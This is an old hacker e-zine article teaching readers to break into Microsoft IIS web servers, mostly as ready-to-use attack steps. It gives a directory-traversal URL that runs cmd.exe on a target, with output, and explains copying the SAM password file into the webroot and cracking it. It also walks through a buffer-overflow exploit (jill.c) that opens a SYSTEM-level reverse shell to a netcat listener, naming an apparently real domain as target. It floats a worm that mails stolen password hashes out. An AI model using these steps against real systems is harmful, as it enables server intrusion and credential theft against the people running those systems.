IIS:- Hacking For The Retarded - Snafu :'######::'##:::::'##::::'###::::'########: '##... ##: ##:'##: ##:::'## ##:::... ##..:: ##:::..:: ##: ##: ##::'##:. ##::::: ##:::: . ######:: ##: ##: ##:'##:::. ##:::: ##:::: :..... ##: ##: ##: ##: #########:::: ##:::: '##::: ##: ##: ##: ##: ##.... ##:::: ##:::: . ######::. ###. ###:: ##:::: ##:::: ##:::: :......::::...::...:::..:::::..:::::..::::: ___ ___ ___ _____ ___ ___________ _ _ _____ | \/ | / _ \| __ \ / _ \ |___ /_ _| \ | || ___| | . . |/ /_\ \ | \// /_\ \ / / | | | \| || |__ | |\/| || _ | | __ | _ | / / | | | . ` || __| | | | || | | | |_\ \| | | |./ /____| |_| |\ || |___ \_| |_/\_| |_/\____/\_| |_/\_____/\___/\_| \_/\____/ .'`-_-`',.`'-_ Issue 40 Article 11 _-'`,.'`-_-`', (____________________________________________________) | IIS:- Hacking For The Retarded | (____________________________________________________) Snafu [x--------------------------------------------------x] This month Bill Gates and his merry team of incompetents have bought joy into the hearts of lamers and script kiddies everywhere, with two brand new administrator compromising exploits. The first exploit was discovered by NSFOCUS and is really quite clever it affects IIS4.0/5.0. The problem is that when a CGI is run IIS decodes it twice. First time it decodes the CGI filename will be to see if its a executable. Then IIS will decode the CGI once again to check the CGI parameters but mistakenly when the second decode occurs it doesn't just decode the CGI parameters it decodes the CGI filename AGAIN. which means we can sneak our ../../ around the IIS security filters :). we change our ../ to ..%255c because this after the initial decoding it will be turned into ..%5c this will pass the security checks but won't break you out of webroot, but because the filename is accidently decoded one more time, ..%5c will be turned into ../ tada! Heres the actual exploit URL http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ this will show you the contents of C:\ and will look something like this Directory of c:\ 01/11/00 09:38a Backup 08/27/97 04:09p bat 02/08/00 06:33a dpt 07/25/97 03:02p ExecSoft 07/25/97 07:53p InetPub 12/06/99 12:26p malafont 03/21/98 12:41p MSSQL 08/20/97 08:47a NM 10/02/98 02:09p Program Files 08/11/98 02:31p 8,168 SMSSETUP.LOG 05/25/01 09:03a TEMP 07/26/97 12:06p W3MB 03/08/01 05:42p webdocs 07/28/97 03:15p webtrend 05/26/01 03:00a WINNT 15 File(s) 8,168 bytes 120,239,616 bytes free if we want to download a file then we must do http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\blah.txt that will copy blah.txt to www.target.com/scripts/blah.txt where you can download the file, but before you go out and "http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\WINNT\REPAIR\SAM" everything is sight you must know that can only run commands f IUSER_machinename. Which is shit basically you can copy most stuff that in Inetpub normally and most stuff on C:\ but if you are really lucky you might be able to copy the SAM to your webdirectory (1in20 chance I would say) once you got the SAM then you can download l0phtcrack from http://www.securitysoftwaretech.com and run SAM audit on it. You are probarly gonna need to brute it for a couple of days if you wanna get the Admin password. there are cracks available for l0pht crack on dalnet if your trial period has expired, I have no problems with cracking l0pht software as the are no longe working for the underground :(. theres a couple of perl scripts available here http://www.packetstorm.securify.com/filedesc/sensedecode.html , but I really don't see any use for them, this is pretty straight forward through your browser. mind you I think you can scan IP blocks with these. The Second exploit for this month was discovered by eeye, which means its lame as fuck and is blatantly obvious .Eeye are the biggest bunch of pricks ever don't ever believe the shit you read about them being supa 1337 uberhaX0rz. its all hype and bullshit. if you need any proof of this then please visit http://www.attrition.org/mirror/attrition/2000/12/15/www.eeye.com this exploit has only been released to plug there new product SecureIIS which is shit and buggy as fuck anyway http://neworder.box.sk/showme.php3?id=4718. The exploit however is noway near as cleaver as the previous one and therefore eeye need not take any credit for it. Its a basic bufferoverflow on an ISAPI extention on IIS5 running on Win2g .the offending overflow is based in an extention for Internet Printer Protocal (IPP.) IPP is for remote printing and shit over HTTP so all webservers running this extention unpatched are vulnarable. Originally when Eeye released the exploit the proof of concept code that was released with it didn't comprimise anything infact it was just made a plug for the SecureIIS software on the victims server 31337!!! but within days people modified the shellcode to make it the exploit a little more serious. The first one released was jill.c this is quite a nice piece of code as it overflows the extention then the shellcode makes the victim server connect to your terminal on the port you specify, connecting to Netcat running on your machine thus creating a reverse shell. you control the remote machine like you were. you can download Netcat for windows from http://www.securitysoftwaretech.com, to get netcat running, type this at your command prompt 'nc -l -p 80 -vv' it should look like this C:\WINDOWS>cd C:\netcat C:\netcat>nc -l -p 80 -vv listening on [any] 80 ... you need to run jill it should look something like this with these parameters: jill it should look something like this: ./jill bnp.org.uk 80 80 ok you can download the C code for Jill variation of the exploit written by dark spyrit from http://www.packetstorm.securify.com/filedesc/jill.c.html just compile and run it on your shell. pretty straight forward stuff. once you got a command prompt you can run shit as Local System security. that means you are the king of the castle and can do almost anything. Its probarly not worth retrieving the SAM cos once the admin realises they got hacked they will probarly change all the passwd's on the system anyway. perhaps if you created a worm to mail you the SAM on a certain date then you might be able to work around it wouldn't be to hard to create something like that. or you could simply steal the SAM straight away and use the admin account to login and do your deeds instead of the exploit I dunno depends whats best for the situation, infact they might not even have 21 or 23 open so you would be forced to use the exploit. Anyway its all common sense at the end of the day. there you go piece of piss hacking Shoutz. NSFOCUS, dark spyrit, solidox, F_S, Phreakazoid, TheMalice, ^Nitr8^, Cheezy (for running through this for me), crypt, F3, Goblinz, Juliet, DaSpikey1, MuNkAy, biohazard, rehack, odysseus, thedohboy, WickedWolf, UnInViTeD, tikka, SWAP, lohap, DavieB, MoRSDeo. and finally my idol, my god McHammer for giving me all the inspiration and love needed to produce this file Stop . . . . . . . . . . Hammertime [HammerOut]